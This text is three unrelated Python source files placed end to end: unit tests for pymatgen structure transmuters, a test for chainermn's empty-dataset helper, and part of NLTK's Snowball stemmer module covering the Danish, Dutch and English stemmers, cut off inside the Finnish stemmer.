from pymatgen.alchemy.filters import ContainsSpecieFilter
from pymatgen.transformations.standard_transformations import \
SubstitutionTransformation, RemoveSpeciesTransformation, \
OrderDisorderedStructureTransformation
from pymatgen.transformations.advanced_transformations import \
SuperTransformation
'''
Created on Mar 5, 2012
'''
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__date__ = "Mar 5, 2012"
test_dir = os.path.join(os.path.dirname(__file__), "..", "..", "..",
'test_files')
class CifTransmuterTest(unittest.TestCase):
def setUp(self):
warnings.simplefilter("ignore")
def tearDown(self):
warnings.simplefilter("default")
def test_init(self):
trans = []
trans.append(SubstitutionTransformation({"Fe": "Mn", "Fe2+": "Mn2+"}))
tsc = CifTransmuter.from_filenames([os.path.join(test_dir,
"MultiStructure.cif")],
trans)
self.assertEqual(len(tsc), 2)
expected_ans = set(["Mn", "O", "Li", "P"])
for s in tsc:
els = set([el.symbol
for el in s.final_structure.composition.elements])
self.assertEqual(expected_ans, els)
class PoscarTransmuterTest(unittest.TestCase):
def test_init(self):
trans = []
trans.append(SubstitutionTransformation({"Fe": "Mn"}))
tsc = PoscarTransmuter.from_filenames([os.path.join(test_dir,
"POSCAR"),
os.path.join(test_dir,
"POSCAR")],
trans)
self.assertEqual(len(tsc), 2)
expected_ans = set(["Mn", "O", "P"])
for s in tsc:
els = set([el.symbol
for el in s.final_structure.composition.elements])
self.assertEqual(expected_ans, els)
def test_transmuter(self):
tsc = PoscarTransmuter.from_filenames(
[os.path.join(test_dir, "POSCAR")])
tsc.append_transformation(RemoveSpeciesTransformation('O'))
self.assertEqual(len(tsc[0].final_structure), 8)
tsc.append_transformation(SubstitutionTransformation({"Fe":
{"Fe2+": 0.25,
"Mn3+": .75},
"P": "P5+"}))
tsc.append_transformation(OrderDisorderedStructureTransformation(),
extend_collection=50)
self.assertEqual(len(tsc), 4)
t = SuperTransformation([SubstitutionTransformation({"Fe2+": "Mg2+"}),
SubstitutionTransformation({"Fe2+": "Zn2+"}),
SubstitutionTransformation({"Fe2+": "Be2+"})])
tsc.append_transformation(t, extend_collection=True)
self.assertEqual(len(tsc), 12)
for x in tsc:
self.assertEqual(len(x), 5, 'something might be wrong with the number of transformations in the history') #should be 4 trans + starting structure
#test the filter
tsc.apply_filter(ContainsSpecieFilter(['Zn2+', 'Be2+', 'Mn4+'],
strict_compare=True, AND=False))
self.assertEqual(len(tsc), 8)
self.assertEqual(tsc.transformed_structures[0].as_dict()[
'history'][-1]['@class'], 'ContainsSpecieFilter')
tsc.apply_filter(ContainsSpecieFilter(['Be2+']))
self.assertEqual(len(tsc), 4)
#Test set_parameter and add_tag.
tsc.set_parameter("para1", "hello")
self.assertEqual(tsc.transformed_structures[0]
.as_dict()['other_parameters']['para1'], 'hello')
tsc.add_tags(["world", "universe"])
self.assertEqual(tsc.transformed_structures[0]
.as_dict()['other_parameters']['tags'],
["world", "universe"])
if __name__ == "__main__":
#import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
import unittest
import numpy as np
from chainermn.datasets import create_empty_dataset
import chainerx as chx
class TestEmptyDataset(unittest.TestCase):
def setUp(self):
pass
def check_create_empty_dataset(self, original_dataset):
empty_dataset = create_empty_dataset(original_dataset)
self.assertEqual(len(original_dataset), len(empty_dataset))
for i in range(len(original_dataset)):
self.assertEqual((), empty_dataset[i])
def test_empty_dataset_numpy(self):
self.check_empty_dataset(np)
def test_empty_dataset_chx(self):
self.check_empty_dataset(chx)
def check_empty_dataset(self, xp):
n = 10
self.check_create_empty_dataset([])
self.check_create_empty_dataset([0])
self.check_create_empty_dataset(list(range(n)))
self.check_create_empty_dataset(list(range(n * 5 - 1)))
self.check_create_empty_dataset(xp.array([]))
self.check_create_empty_dataset(xp.array([0]))
self.check_create_empty_dataset(xp.arange(n))
self.check_create_empty_dataset(xp.arange(n * 5 - 1))
|
"""
Snowball stemmers
This module provides a port of the Snowball stemmers
developed by Martin Porter.
There is also a demo function: `snowball.demo()`.
"""
from __future__ import unicode_literals, print_function
from nltk import compat
from nltk.corpus import stopwords
from nltk.stem import porter
from nltk.stem.util import suffix_replace
from nltk.stem.api import StemmerI
class SnowballStemmer(StemmerI):
"""
Snowball Stemmer
The following languages are supported:
Danish, Dutch, English, Finnish, French, German,
Hungarian, Italian, Norwegian, Portuguese, Romanian, Russian,
Spanish and Swedish.
The algorithm for English is documented here:
Porter, M. \"An algorithm for suffix stripping.\"
Program 14.3 (1980): 130-137.
The algorithms have been developed by Martin Porter.
These stemmers are called Snowball, because Porter created
a programming language with this name for creating
new stemming algorithms. There is more information available
at http://snowball.tartarus.org/
The stemmer is invoked as shown below:
>>> from nltk.stem import SnowballStemmer
>>> print(" ".join(SnowballStemmer.languages)) # See which languages are supported
danish dutch english finnish french german hungarian
italian norwegian porter portuguese romanian russian
spanish swedish
>>> stemmer = SnowballStemmer("german") # Choose a language
>>> stemmer.stem("Autobahnen") # Stem a word
'autobahn'
Invoking the stemmers that way is useful if you do not know the
language to be stemmed at runtime. Alternatively, if you already know
the language, then you can invoke the language specific stemmer directly:
>>> from nltk.stem.snowball import GermanStemmer
>>> stemmer = GermanStemmer()
>>> stemmer.stem("Autobahnen")
'autobahn'
:param language: The language whose subclass is instantiated.
:type language: str or unicode
:param ignore_stopwords: If set to True, stopwords are
not stemmed and returned unchanged.
Set to False by default.
:type ignore_stopwords: bool
:raise ValueError: If there is no stemmer for the specified
language, a ValueError is raised.
"""
languages = ("danish", "dutch", "english", "finnish", "french", "german",
"hungarian", "italian", "norwegian", "porter", "portuguese",
"romanian", "russian", "spanish", "swedish")
def __init__(self, language, ignore_stopwords=False):
if language not in self.languages:
raise ValueError("The language '%s' is not supported." % language)
stemmerclass = globals()[language.capitalize() + "Stemmer"]
self.stemmer = stemmerclass(ignore_stopwords)
self.stem = self.stemmer.stem
self.stopwords = self.stemmer.stopwords
@compat.python_2_unicode_compatible
class _LanguageSpecificStemmer(StemmerI):
"""
This helper subclass offers the possibility
to invoke a specific stemmer directly.
This is useful if you already know the language to be stemmed at runtime.
Create an instance of the Snowball stemmer.
:param ignore_stopwords: If set to True, stopwords are
not stemmed and returned unchanged.
Set to False by default.
:type ignore_stopwords: bool
"""
def __init__(self, ignore_stopwords=False):
# The language is the name of the class, minus the final "Stemmer".
language = type(self).__name__.lower()
if language.endswith("stemmer"):
language = language[:-7]
self.stopwords = set()
if ignore_stopwords:
try:
for word in stopwords.words(language):
self.stopwords.add(word)
except IOError:
raise ValueError("%r has no list of stopwords. Please set"
" 'ignore_stopwords' to 'False'." % self)
def __repr__(self):
"""
Print out the string representation of the respective class.
"""
return "<%s>" % type(self).__name__
class PorterStemmer(_LanguageSpecificStemmer, porter.PorterStemmer):
"""
A word stemmer based on the original Porter stemming algorithm.
Porter, M. \"An algorithm for suffix stripping.\"
Program 14.3 (1980): 130-137.
A few minor modifications have been made to Porter's basic
algorithm. See the source code of the module
nltk.stem.porter for more information.
"""
def __init__(self, ignore_stopwords=False):
_LanguageSpecificStemmer.__init__(self, ignore_stopwords)
porter.PorterStemmer.__init__(self)
class _ScandinavianStemmer(_LanguageSpecificStemmer):
"""
This subclass encapsulates a method for defining the string region R1.
It is used by the Danish, Norwegian, and Swedish stemmer.
"""
def _r1_scandinavian(self, word, vowels):
"""
Return the region R1 that is used by the Scandinavian stemmers.
R1 is the region after the first non-vowel following a vowel,
or is the null region at the end of the word if there is no
such non-vowel. But then R1 is adjusted so that the region
before it contains at least three letters.
:param word: The word whose region R1 is determined.
:type word: str or unicode
:param vowels: The vowels of the respective language that are
used to determine the region R1.
:type vowels: unicode
:return: the region R1 for the respective word.
:rtype: unicode
:note: This helper method is invoked by the respective stem method of
the subclasses DanishStemmer, NorwegianStemmer, and
SwedishStemmer. It is not to be invoked directly!
"""
r1 = ""
for i in range(1, len(word)):
if word[i] not in vowels and word[i-1] in vowels:
if len(word[:i+1]) < 3 and len(word[:i+1]) > 0:
r1 = word[3:]
elif len(word[:i+1]) >= 3:
r1 = word[i+1:]
else:
return word
break
return r1
class _StandardStemmer(_LanguageSpecificStemmer):
"""
This subclass encapsulates two methods for defining the standard versions
of the string regions R1, R2, and RV.
"""
def _r1r2_standard(self, word, vowels):
"""
Return the standard interpretations of the string regions R1 and R2.
R1 is the region after the first non-vowel following a vowel,
or is the null region at the end of the word if there is no
such non-vowel.
R2 is the region after the first non-vowel following a vowel
in R1, or is the null region at the end of the word if there
is no such non-vowel.
:param word: The word whose regions R1 and R2 are determined.
:type word: str or unicode
:param vowels: The vowels of the respective language that are
used to determine the regions R1 and R2.
:type vowels: unicode
:return: (r1,r2), the regions R1 and R2 for the respective word.
:rtype: tuple
:note: This helper method is invoked by the respective stem method of
the subclasses DutchStemmer, FinnishStemmer,
FrenchStemmer, GermanStemmer, ItalianStemmer,
PortugueseStemmer, RomanianStemmer, and SpanishStemmer.
It is not to be invoked directly!
:note: A detailed description of how to define R1 and R2
can be found at http://snowball.tartarus.org/texts/r1r2.html
"""
r1 = ""
r2 = ""
for i in range(1, len(word)):
if word[i] not in vowels and word[i-1] in vowels:
r1 = word[i+1:]
break
for i in range(1, len(r1)):
if r1[i] not in vowels and r1[i-1] in vowels:
r2 = r1[i+1:]
break
return (r1, r2)
def _rv_standard(self, word, vowels):
"""
Return the standard interpretation of the string region RV.
If the second letter is a consonant, RV is the region after the
next following vowel. If the first two letters are vowels, RV is
the region after the next following consonant. Otherwise, RV is
the region after the third letter.
:param word: The word whose region RV is determined.
:type word: str or unicode
:param vowels: The vowels of the respective language that are
used to determine the region RV.
:type vowels: unicode
:return: the region RV for the respective word.
:rtype: unicode
:note: This helper method is invoked by the respective stem method of
the subclasses ItalianStemmer, PortugueseStemmer,
RomanianStemmer, and SpanishStemmer. It is not to be
invoked directly!
"""
rv = ""
if len(word) >= 2:
if word[1] not in vowels:
for i in range(2, len(word)):
if word[i] in vowels:
rv = word[i+1:]
break
elif word[0] in vowels and word[1] in vowels:
for i in range(2, len(word)):
if word[i] not in vowels:
rv = word[i+1:]
break
else:
rv = word[3:]
return rv
class DanishStemmer(_ScandinavianStemmer):
"""
The Danish Snowball stemmer.
:cvar __vowels: The Danish vowels.
:type __vowels: unicode
:cvar __consonants: The Danish consonants.
:type __consonants: unicode
:cvar __double_consonants: The Danish double consonants.
:type __double_consonants: tuple
:cvar __s_ending: Letters that may directly appear before a word final 's'.
:type __s_ending: unicode
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
:type __step2_suffixes: tuple
:cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
:type __step3_suffixes: tuple
:note: A detailed description of the Danish
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/danish/stemmer.html
"""
# The language's vowels and other important characters are defined.
__vowels = "aeiouy\xE6\xE5\xF8"
__consonants = "bcdfghjklmnpqrstvwxz"
__double_consonants = ("bb", "cc", "dd", "ff", "gg", "hh", "jj",
"kk", "ll", "mm", "nn", "pp", "qq", "rr",
"ss", "tt", "vv", "ww", "xx", "zz")
__s_ending = "abcdfghjklmnoprtvyz\xE5"
# The different suffixes, divided into the algorithm's steps
# and organized by length, are listed in tuples.
__step1_suffixes = ("erendes", "erende", "hedens", "ethed",
"erede", "heden", "heder", "endes",
"ernes", "erens", "erets", "ered",
"ende", "erne", "eren", "erer", "heds",
"enes", "eres", "eret", "hed", "ene", "ere",
"ens", "ers", "ets", "en", "er", "es", "et",
"e", "s")
__step2_suffixes = ("gd", "dt", "gt", "kt")
__step3_suffixes = ("elig", "l\xF8st", "lig", "els", "ig")
def stem(self, word):
"""
Stem a Danish word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
# Every word is put into lower case for normalization.
word = word.lower()
if word in self.stopwords:
return word
# After this, the required regions are generated
# by the respective helper method.
r1 = self._r1_scandinavian(word, self.__vowels)
# Then the actual stemming process starts.
# Every new step is explicitly indicated
# according to the descriptions on the Snowball website.
# STEP 1
for suffix in self.__step1_suffixes:
if r1.endswith(suffix):
if suffix == "s":
if word[-2] in self.__s_ending:
word = word[:-1]
r1 = r1[:-1]
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
break
# STEP 2
for suffix in self.__step2_suffixes:
if r1.endswith(suffix):
word = word[:-1]
r1 = r1[:-1]
break
# STEP 3
if r1.endswith("igst"):
word = word[:-2]
r1 = r1[:-2]
for suffix in self.__step3_suffixes:
if r1.endswith(suffix):
if suffix == "l\xF8st":
word = word[:-1]
r1 = r1[:-1]
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
if r1.endswith(self.__step2_suffixes):
word = word[:-1]
r1 = r1[:-1]
break
# STEP 4: Undouble
for double_cons in self.__double_consonants:
if word.endswith(double_cons) and len(word) > 3:
word = word[:-1]
break
return word
class DutchStemmer(_StandardStemmer):
"""
The Dutch Snowball stemmer.
:cvar __vowels: The Dutch vowels.
:type __vowels: unicode
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step3b_suffixes: Suffixes to be deleted in step 3b of the algorithm.
:type __step3b_suffixes: tuple
:note: A detailed description of the Dutch
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/dutch/stemmer.html
"""
__vowels = "aeiouy\xE8"
__step1_suffixes = ("heden", "ene", "en", "se", "s")
__step3b_suffixes = ("baar", "lijk", "bar", "end", "ing", "ig")
def stem(self, word):
"""
Stem a Dutch word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
if word in self.stopwords:
return word
step2_success = False
# Vowel accents are removed.
word = (word.replace("\xE4", "a").replace("\xE1", "a")
.replace("\xEB", "e").replace("\xE9", "e")
.replace("\xED", "i").replace("\xEF", "i")
.replace("\xF6", "o").replace("\xF3", "o")
.replace("\xFC", "u").replace("\xFA", "u"))
# An initial 'y', a 'y' after a vowel,
# and an 'i' between self.__vowels is put into upper case.
# As from now these are treated as consonants.
if word.startswith("y"):
word = "".join(("Y", word[1:]))
for i in range(1, len(word)):
if word[i-1] in self.__vowels and word[i] == "y":
word = "".join((word[:i], "Y", word[i+1:]))
for i in range(1, len(word)-1):
if (word[i-1] in self.__vowels and word[i] == "i" and
word[i+1] in self.__vowels):
word = "".join((word[:i], "I", word[i+1:]))
r1, r2 = self._r1r2_standard(word, self.__vowels)
# R1 is adjusted so that the region before it
# contains at least 3 letters.
for i in range(1, len(word)):
if word[i] not in self.__vowels and word[i-1] in self.__vowels:
if len(word[:i+1]) < 3 and len(word[:i+1]) > 0:
r1 = word[3:]
elif len(word[:i+1]) == 0:
return word
break
# STEP 1
for suffix in self.__step1_suffixes:
if r1.endswith(suffix):
if suffix == "heden":
word = suffix_replace(word, suffix, "heid")
r1 = suffix_replace(r1, suffix, "heid")
if r2.endswith("heden"):
r2 = suffix_replace(r2, suffix, "heid")
elif (suffix in ("ene", "en") and
not word.endswith("heden") and
word[-len(suffix)-1] not in self.__vowels and
word[-len(suffix)-3:-len(suffix)] != "gem"):
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
if word.endswith(("kk", "dd", "tt")):
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
elif (suffix in ("se", "s") and
word[-len(suffix)-1] not in self.__vowels and
word[-len(suffix)-1] != "j"):
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
break
# STEP 2
if r1.endswith("e") and word[-2] not in self.__vowels:
step2_success = True
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
if word.endswith(("kk", "dd", "tt")):
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
# STEP 3a
if r2.endswith("heid") and word[-5] != "c":
word = word[:-4]
r1 = r1[:-4]
r2 = r2[:-4]
if (r1.endswith("en") and word[-3] not in self.__vowels and
word[-5:-2] != "gem"):
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
if word.endswith(("kk", "dd", "tt")):
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
# STEP 3b: Derivational suffixes
for suffix in self.__step3b_suffixes:
if r2.endswith(suffix):
if suffix in ("end", "ing"):
word = word[:-3]
r2 = r2[:-3]
if r2.endswith("ig") and word[-3] != "e":
word = word[:-2]
else:
if word.endswith(("kk", "dd", "tt")):
word = word[:-1]
elif suffix == "ig" and word[-3] != "e":
word = word[:-2]
elif suffix == "lijk":
word = word[:-4]
r1 = r1[:-4]
if r1.endswith("e") and word[-2] not in self.__vowels:
word = word[:-1]
if word.endswith(("kk", "dd", "tt")):
word = word[:-1]
elif suffix == "baar":
word = word[:-4]
elif suffix == "bar" and step2_success:
word = word[:-3]
break
# STEP 4: Undouble vowel
if len(word) >= 4:
if word[-1] not in self.__vowels and word[-1] != "I":
if word[-3:-1] in ("aa", "ee", "oo", "uu"):
if word[-4] not in self.__vowels:
word = "".join((word[:-3], word[-3], word[-1]))
# All occurrences of 'I' and 'Y' are put back into lower case.
word = word.replace("I", "i").replace("Y", "y")
return word
class EnglishStemmer(_StandardStemmer):
"""
The English Snowball stemmer.
:cvar __vowels: The English vowels.
:type __vowels: unicode
:cvar __double_consonants: The English double consonants.
:type __double_consonants: tuple
:cvar __li_ending: Letters that may directly appear before a word final 'li'.
:type __li_ending: unicode
:cvar __step0_suffixes: Suffixes to be deleted in step 0 of the algorithm.
:type __step0_suffixes: tuple
:cvar __step1a_suffixes: Suffixes to be deleted in step 1a of the algorithm.
:type __step1a_suffixes: tuple
:cvar __step1b_suffixes: Suffixes to be deleted in step 1b of the algorithm.
:type __step1b_suffixes: tuple
:cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
:type __step2_suffixes: tuple
:cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
:type __step3_suffixes: tuple
:cvar __step4_suffixes: Suffixes to be deleted in step 4 of the algorithm.
:type __step4_suffixes: tuple
:cvar __step5_suffixes: Suffixes to be deleted in step 5 of the algorithm.
:type __step5_suffixes: tuple
:cvar __special_words: A dictionary containing words
which have to be stemmed specially.
:type __special_words: dict
:note: A detailed description of the English
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/english/stemmer.html
"""
__vowels = "aeiouy"
__double_consonants = ("bb", "dd", "ff", "gg", "mm", "nn",
"pp", "rr", "tt")
__li_ending = "cdeghkmnrt"
__step0_suffixes = ("'s'", "'s", "'")
__step1a_suffixes = ("sses", "ied", "ies", "us", "ss", "s")
__step1b_suffixes = ("eedly", "ingly", "edly", "eed", "ing", "ed")
__step2_suffixes = ('ization', 'ational', 'fulness', 'ousness',
'iveness', 'tional', 'biliti', 'lessli',
'entli', 'ation', 'alism', 'aliti', 'ousli',
'iviti', 'fulli', 'enci', 'anci', 'abli',
'izer', 'ator', 'alli', 'bli', 'ogi', 'li')
__step3_suffixes = ('ational', 'tional', 'alize', 'icate', 'iciti',
'ative', 'ical', 'ness', 'ful')
__step4_suffixes = ('ement', 'ance', 'ence', 'able', 'ible', 'ment',
'ant', 'ent', 'ism', 'ate', 'iti', 'ous',
'ive', 'ize', 'ion', 'al', 'er', 'ic')
__step5_suffixes = ("e", "l")
__special_words = {"skis" : "ski",
"skies" : "sky",
"dying" : "die",
"lying" : "lie",
"tying" : "tie",
"idly" : "idl",
"gently" : "gentl",
"ugly" : "ugli",
"early" : "earli",
"only" : "onli",
"singly" : "singl",
"sky" : "sky",
"news" : "news",
"howe" : "howe",
"atlas" : "atlas",
"cosmos" : "cosmos",
"bias" : "bias",
"andes" : "andes",
"inning" : "inning",
"innings" : "inning",
"outing" : "outing",
"outings" : "outing",
"canning" : "canning",
"cannings" : "canning",
"herring" : "herring",
"herrings" : "herring",
"earring" : "earring",
"earrings" : "earring",
"proceed" : "proceed",
"proceeds" : "proceed",
"proceeded" : "proceed",
"proceeding" : "proceed",
"exceed" : "exceed",
"exceeds" : "exceed",
"exceeded" : "exceed",
"exceeding" : "exceed",
"succeed" : "succeed",
"succeeds" : "succeed",
"succeeded" : "succeed",
"succeeding" : "succeed"}
def stem(self, word):
"""
Stem an English word and return the stemmed form.
:param word: The word that is stemmed.
:type word: str or unicode
:return: The stemmed form.
:rtype: unicode
"""
word = word.lower()
if word in self.stopwords or len(word) <= 2:
return word
elif word in self.__special_words:
return self.__special_words[word]
# Map the different apostrophe characters to a single consistent one
word = (word.replace("\u2019", "\x27")
.replace("\u2018", "\x27")
.replace("\u201B", "\x27"))
if word.startswith("\x27"):
word = word[1:]
if word.startswith("y"):
word = "".join(("Y", word[1:]))
for i in range(1, len(word)):
if word[i-1] in self.__vowels and word[i] == "y":
word = "".join((word[:i], "Y", word[i+1:]))
step1a_vowel_found = False
step1b_vowel_found = False
r1 = ""
r2 = ""
if word.startswith(("gener", "commun", "arsen")):
if word.startswith(("gener", "arsen")):
r1 = word[5:]
else:
r1 = word[6:]
for i in range(1, len(r1)):
if r1[i] not in self.__vowels and r1[i-1] in self.__vowels:
r2 = r1[i+1:]
break
else:
r1, r2 = self._r1r2_standard(word, self.__vowels)
# STEP 0
for suffix in self.__step0_suffixes:
if word.endswith(suffix):
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
break
# STEP 1a
for suffix in self.__step1a_suffixes:
if word.endswith(suffix):
if suffix == "sses":
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
elif suffix in ("ied", "ies"):
if len(word[:-len(suffix)]) > 1:
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
else:
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
elif suffix == "s":
for letter in word[:-2]:
if letter in self.__vowels:
step1a_vowel_found = True
break
if step1a_vowel_found:
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
break
# STEP 1b
for suffix in self.__step1b_suffixes:
if word.endswith(suffix):
if suffix in ("eed", "eedly"):
if r1.endswith(suffix):
word = suffix_replace(word, suffix, "ee")
if len(r1) >= len(suffix):
r1 = suffix_replace(r1, suffix, "ee")
else:
r1 = ""
if len(r2) >= len(suffix):
r2 = suffix_replace(r2, suffix, "ee")
else:
r2 = ""
else:
for letter in word[:-len(suffix)]:
if letter in self.__vowels:
step1b_vowel_found = True
break
if step1b_vowel_found:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
if word.endswith(("at", "bl", "iz")):
word = "".join((word, "e"))
r1 = "".join((r1, "e"))
if len(word) > 5 or len(r1) >=3:
r2 = "".join((r2, "e"))
elif word.endswith(self.__double_consonants):
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
elif ((r1 == "" and len(word) >= 3 and
word[-1] not in self.__vowels and
word[-1] not in "wxY" and
word[-2] in self.__vowels and
word[-3] not in self.__vowels)
or
(r1 == "" and len(word) == 2 and
word[0] in self.__vowels and
word[1] not in self.__vowels)):
word = "".join((word, "e"))
if len(r1) > 0:
r1 = "".join((r1, "e"))
if len(r2) > 0:
r2 = "".join((r2, "e"))
break
# STEP 1c
if len(word) > 2 and word[-1] in "yY" and word[-2] not in self.__vowels:
word = "".join((word[:-1], "i"))
if len(r1) >= 1:
r1 = "".join((r1[:-1], "i"))
else:
r1 = ""
if len(r2) >= 1:
r2 = "".join((r2[:-1], "i"))
else:
r2 = ""
# STEP 2
for suffix in self.__step2_suffixes:
if word.endswith(suffix):
if r1.endswith(suffix):
if suffix == "tional":
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
elif suffix in ("enci", "anci", "abli"):
word = "".join((word[:-1], "e"))
if len(r1) >= 1:
r1 = "".join((r1[:-1], "e"))
else:
r1 = ""
if len(r2) >= 1:
r2 = "".join((r2[:-1], "e"))
else:
r2 = ""
elif suffix == "entli":
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
elif suffix in ("izer", "ization"):
word = suffix_replace(word, suffix, "ize")
if len(r1) >= len(suffix):
r1 = suffix_replace(r1, suffix, "ize")
else:
r1 = ""
if len(r2) >= len(suffix):
r2 = suffix_replace(r2, suffix, "ize")
else:
r2 = ""
elif suffix in ("ational", "ation", "ator"):
word = suffix_replace(word, suffix, "ate")
if len(r1) >= len(suffix):
r1 = suffix_replace(r1, suffix, "ate")
else:
r1 = ""
if len(r2) >= len(suffix):
r2 = suffix_replace(r2, suffix, "ate")
else:
r2 = "e"
elif suffix in ("alism", "aliti", "alli"):
word = suffix_replace(word, suffix, "al")
if len(r1) >= len(suffix):
r1 = suffix_replace(r1, suffix, "al")
else:
r1 = ""
if len(r2) >= len(suffix):
r2 = suffix_replace(r2, suffix, "al")
else:
r2 = ""
elif suffix == "fulness":
word = word[:-4]
r1 = r1[:-4]
r2 = r2[:-4]
elif suffix in ("ousli", "ousness"):
word = suffix_replace(word, suffix, "ous")
if len(r1) >= len(suffix):
r1 = suffix_replace(r1, suffix, "ous")
else:
r1 = ""
if len(r2) >= len(suffix):
r2 = suffix_replace(r2, suffix, "ous")
else:
r2 = ""
elif suffix in ("iveness", "iviti"):
word = suffix_replace(word, suffix, "ive")
if len(r1) >= len(suffix):
r1 = suffix_replace(r1, suffix, "ive")
else:
r1 = ""
if len(r2) >= len(suffix):
r2 = suffix_replace(r2, suffix, "ive")
else:
r2 = "e"
elif suffix in ("biliti", "bli"):
word = suffix_replace(word, suffix, "ble")
if len(r1) >= len(suffix):
r1 = suffix_replace(r1, suffix, "ble")
else:
r1 = ""
if len(r2) >= len(suffix):
r2 = suffix_replace(r2, suffix, "ble")
else:
r2 = ""
elif suffix == "ogi" and word[-4] == "l":
word = word[:-1]
r1 = r1[:-1]
r2 = r2[:-1]
elif suffix in ("fulli", "lessli"):
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
elif suffix == "li" and word[-3] in self.__li_ending:
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
break
# STEP 3
for suffix in self.__step3_suffixes:
if word.endswith(suffix):
if r1.endswith(suffix):
if suffix == "tional":
word = word[:-2]
r1 = r1[:-2]
r2 = r2[:-2]
elif suffix == "ational":
word = suffix_replace(word, suffix, "ate")
if len(r1) >= len(suffix):
r1 = suffix_replace(r1, suffix, "ate")
else:
r1 = ""
if len(r2) >= len(suffix):
r2 = suffix_replace(r2, suffix, "ate")
else:
r2 = ""
elif suffix == "alize":
word = word[:-3]
r1 = r1[:-3]
r2 = r2[:-3]
elif suffix in ("icate", "iciti", "ical"):
word = suffix_replace(word, suffix, "ic")
if len(r1) >= len(suffix):
r1 = suffix_replace(r1, suffix, "ic")
else:
r1 = ""
if len(r2) >= len(suffix):
r2 = suffix_replace(r2, suffix, "ic")
else:
r2 = ""
elif suffix in ("ful", "ness"):
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
elif suffix == "ative" and r2.endswith(suffix):
word = word[:-5]
r1 = r1[:-5]
r2 = r2[:-5]
break
# STEP 4
for suffix in self.__step4_suffixes:
if word.endswith(suffix):
if r2.endswith(suffix):
if suffix == "ion":
if word[-4] in "st":
word = word[:-3]
r1 = r1[:-3]
r2 = r2[:-3]
else:
word = word[:-len(suffix)]
r1 = r1[:-len(suffix)]
r2 = r2[:-len(suffix)]
break
# STEP 5
if r2.endswith("l") and word[-2] == "l":
word = word[:-1]
elif r2.endswith("e"):
word = word[:-1]
elif r1.endswith("e"):
if len(word) >= 4 and (word[-2] in self.__vowels or
word[-2] in "wxY" or
word[-3] not in self.__vowels or
word[-4] in self.__vowels):
word = word[:-1]
word = word.replace("Y", "y")
return word
class FinnishStemmer(_StandardStemmer):
"""
The Finnish Snowball stemmer.
:cvar __vowels: The Finnish vowels.
:type __vowels: unicode
:cvar __restricted_vowels: A subset of the Finnish vowels.
:type __restricted_vowels: unicode
:cvar __long_vowels: The Finnish vowels in their long forms.
:type __long_vowels: tuple
:cvar __consonants: The Finnish consonants.
:type __consonants: unicode
:cvar __double_consonants: The Finnish double consonants.
:type __double_consonants: tuple
:cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
:type __step1_suffixes: tuple
:cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
:type __step2_suffixes: tuple
:cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
:type __step3_suffixes: tuple
:cvar __step4_suffixes: Suffixes to be deleted in step 4 of the algorithm.
:type __step4_suffixes: tuple
:note: A detailed description of the Finnish
stemming algorithm can be found under
http://snowball.tartarus.org/algorithms/finnish/stemmer.html
"""
__vowels = "aeiouy\xE4\xF6"
__restricted_vowels = "aeiou\xE4\xF6"
__long_vowels = ("aa", "ee", "ii", "oo", "uu", "\xE4\xE4",
"\xF6\xF6")
__consonants = "bcdfghjklmnpqrstvwxz"
__double_consonants = ("bb", "cc", "dd", "ff", "gg", "hh", "jj",
"kk", "ll", "mm", "nn", "pp", "qq", "rr",
"ss", "tt", "vv", "ww", "xx", "zz")
__step1_suffixes = ('kaan', 'k\xE4\xE4n', 'sti', 'kin', 'han',
'h\xE4n', 'ko', 'k\xF6', 'pa', 'p\xE4')
__step2_suffixes = ('nsa', 'ns\xE4', 'mme', 'nne', 'si', 'ni',
'an', '\xE4n', 'en')
__step3_suffixes = ('siin', 'tten', 'seen', 'han', 'hen', 'hin',
'hon', 'h\xE4n', 'h\xF6n', 'den', 'tta',
'tt\xE4', 'ssa', 'ss\xE4', 'sta',
'st\xE4', 'lla', 'll\xE4', 'lta',
'lt\xE4', 'lle', 'ksi', 'ine', 'ta',
